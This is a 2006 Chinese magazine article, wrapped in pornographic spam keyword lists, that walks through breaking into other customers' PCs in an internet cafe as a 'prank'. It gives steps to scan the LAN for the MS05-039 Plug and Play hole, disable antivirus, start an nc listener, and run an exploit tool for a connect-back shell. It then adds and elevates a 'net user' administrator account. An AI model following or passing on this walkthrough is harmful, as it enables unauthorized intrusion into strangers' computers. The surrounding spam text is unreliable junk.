亚洲免费av电影一区二区三区,日韩爱爱视频,51精品视频一区二区三区,91视频爱爱,日韩欧美在线播放视频,中文字幕少妇AV,亚洲电影中文字幕,久久久久亚洲av成人网址,久久综合视频网站,国产在线不卡免费播放

        ?

        網(wǎng)吧里翻江倒海

        2006-11-02 06:19:22
        計算機應用文摘 2006年10期
        關鍵詞:命令行本機監(jiān)聽

        溫 鵬

        筆者的朋友小王是個黑客愛好者,有時一起去網(wǎng)吧他要搞點小“破壞”,進行所謂的侵入式攻擊,當作無聊時的“游戲”??墒且恢绷罟P者不解的就是,他每次都能輕易得手。究竟是什么攻擊會這么“霸道”呢?經(jīng)過筆者一番“軟磨硬套”后,小王舉了一個例子來示范。

        提示

        本文以Windows即插即用遠程代碼執(zhí)行漏洞(MS05-039)為例,造成該漏洞的主要原因是即插即用服務中未經(jīng)檢查的緩沖區(qū)出現(xiàn)了溢出漏洞,受影響的系統(tǒng)主要包括Windows 2000 SP4和Windows XP SP1。

        補丁地址:http://www.microsoft.com/china/technet/security/bulletin/MS05-039.mspx。

        掃描檢測

        首先下載MS05039漏洞掃描工具(http://www.foundstone.com/),這個安全小工具只是用于檢測系統(tǒng)是否存在MS05039漏洞,不具備攻擊功能。下載解壓后運行其中的MS05039Scan.exe,在主界面中,先填寫要掃描的范圍。通常局域網(wǎng)內(nèi)電腦的IP都分配在192.168.0.1到192.168.0.254之間,如果此時想對所在的網(wǎng)吧做一次整體掃描,就在開始IP的標簽處,輸入192.168.0.1的IP地址,然后在下面結束IP的標簽處,輸入相對應的192.168.0.254的IP地址(圖1)。

        確定起始IP地址之后,單擊下面的“掃描”按鈕,這時在下方會逐個顯示出內(nèi)網(wǎng)的所有電腦,以及對這些電腦掃描的結果(圖2)。圖2中目前所選中的信息條,就是內(nèi)網(wǎng)機器中含有MS05039漏洞的主機。

        在掃描結果欄目內(nèi),顯示主機Status標簽為Not vulnerable的字符,代表該主機不含有MS05039溢出漏洞。如果Status標簽內(nèi),出現(xiàn)的是vulnerable字符,則此主機含有MS05039溢出漏洞。

        守株待兔

        下面要做的是監(jiān)聽本機端口,等待意外收獲。

        提到監(jiān)聽本機端口,自然會想到大名鼎鼎的瑞士軍刀NC工具,它以短小精悍著稱,在網(wǎng)上找到它并不是什么難事。由于有些殺毒軟件要對NC工具報警,為了省去麻煩,先關閉殺毒軟件的實時監(jiān)控以及按訪問掃描,然后將它下載到C盤中。

        單擊“開始”菜單,選擇“運行”,打開“運行”對話框。在“打開”標簽處輸入CMD命令,然后敲擊“回車”鍵。在彈出的命令窗體中,轉換目錄到NC程序所在的位置。在命令行處輸入“NC–vv–l–p51”的命令,然后敲擊“回車”鍵,即可實現(xiàn)對本機51端口的監(jiān)聽(圖3)。

        在剛才執(zhí)行的NC命令中:-vv參數(shù)代表顯示更詳細的監(jiān)聽內(nèi)容;-l代表連接端口關閉后,仍然繼續(xù)監(jiān)聽;-p進行本地端口監(jiān)聽,后跟數(shù)字就是所要監(jiān)聽的端口號。

        溢出攻擊

        “天羅地網(wǎng)”布下了,現(xiàn)在開始“引誘”主機,讓它自投羅網(wǎng),“鉆進”已經(jīng)設下的陷阱,從而能夠省去“徒勞無功”的等待時間。

        小知識

        SHELL是指操作系統(tǒng)的最外層,管理著用戶與操作系統(tǒng)交互、通訊、執(zhí)行等操作。如果能得到對方的SHELL,也就代表著擁有了與對方計算機直接溝通、下達命令的平臺。

        為了抓住這些含有MS05039溢出漏洞的機器,還要下載MS05039溢出工具。打開一個新的C M D命令行窗口,切換到MS05039溢出工具的目錄內(nèi)。在命令行下輸入MS05039.exe192.168.0.89 192.168.0.55 511。溢出192.168.0.89是對方的IP,接收溢出信息的是本機192.168.0.55,51是接收端口。最后參數(shù)代表溢出模式,可選1和0,是根據(jù)不同的版本補丁來定的。如果此機器剛才用掃描器確實檢測出含有溢出漏洞,但是用0總是溢出不成功,我們可以換成1。

        按下“回車”鍵后,開始“引誘式”溢出攻擊,稍微等待幾秒鐘后(圖4),屏幕就會顯示出帶有英文字符的OK,這簡單地說就是溢出成功的意思。

        返回到NC監(jiān)聽界面,此時就會發(fā)現(xiàn)已經(jīng)獲取到了對方的SHELL。接下來就在該SHELL平臺中,敲入net user WENPENG 123456 /ADD的命令,將“WENPENG”賬號添加到被入侵主機內(nèi),再用net localgroup提升這個賬號到管理員組。

        隨后就可以使用遠程客戶端軟件,直接輸入剛剛建立的用戶名,進行遠程“惡作劇”了。也能使用其他第三方軟件連接控制等,這類方法很多,可以靈活運用。

        本文中所涉及到的圖表、注解、公式等內(nèi)容請以PDF格式閱讀原文。

        猜你喜歡
        命令行本機監(jiān)聽
        千元監(jiān)聽風格Hi-Fi箱新選擇 Summer audio A-401
        Windows 10新版CMD更新
        網(wǎng)絡監(jiān)聽的防范措施
        電子制作(2017年20期)2017-04-26 06:58:02
        Linux系統(tǒng)下GRIB2格式GFS資料轉為GRIB1格式的方法詳解
        應召反潛時無人機監(jiān)聽航路的規(guī)劃
        局域網(wǎng)監(jiān)聽軟件的設計
        河南科技(2014年5期)2014-02-27 14:08:21
        FreeBSD關機重啟命令
        WP7手機自動出現(xiàn)skydrive文件夾
        電腦迷(2012年9期)2012-04-29 02:08:25
        不花錢,動態(tài)域名隨便玩
        低碳生活,從命令行開始
        国产免费av片无码永久免费| 国产一区二区三区白浆肉丝| 日本a级一级淫片免费观看| 免费国产成人肉肉视频大全| 中文字幕一区二区三区视频| 米奇7777狠狠狠狠视频影院| 91spa国产无码| 亚洲美女av一区二区| 一区二区三区在线少妇| 无码精品人妻一区二区三区av| 国产目拍亚洲精品一区二区| 日韩精品欧美激情亚洲综合| 亚洲欧美国产成人综合不卡| 少妇人妻无一区二区三区| 91在线视频在线视频| 女人高潮被爽到呻吟在线观看| 精品乱子伦一区二区三区| 亚洲国产不卡免费视频| 蜜桃视频免费进入观看| 成人h视频在线观看| 久久中国国产Av秘 入口| 自拍情爱视频在线观看| 亚洲熟妇无码av在线播放| 丰满爆乳在线播放| 99福利网| 亚洲国产一区中文字幕| 人人爽久久久噜人人看| 免费无码又爽又刺激网站| 亚洲性啪啪无码AV天堂| 亚洲一区二区三区最新视频| 全免费a级毛片免费看无码| 孩交精品xxxx视频视频| 美女裸体无遮挡免费视频的网站| 一区二区三区在线日本| 久久国产精品一国产精品金尊| 国产一区二区三区在线观看免费| 九九99久久精品在免费线97 | 爱性久久久久久久久| 国产人在线成免费视频麻豆| 一区二区黄色素人黄色| 国产免费观看久久黄av麻豆|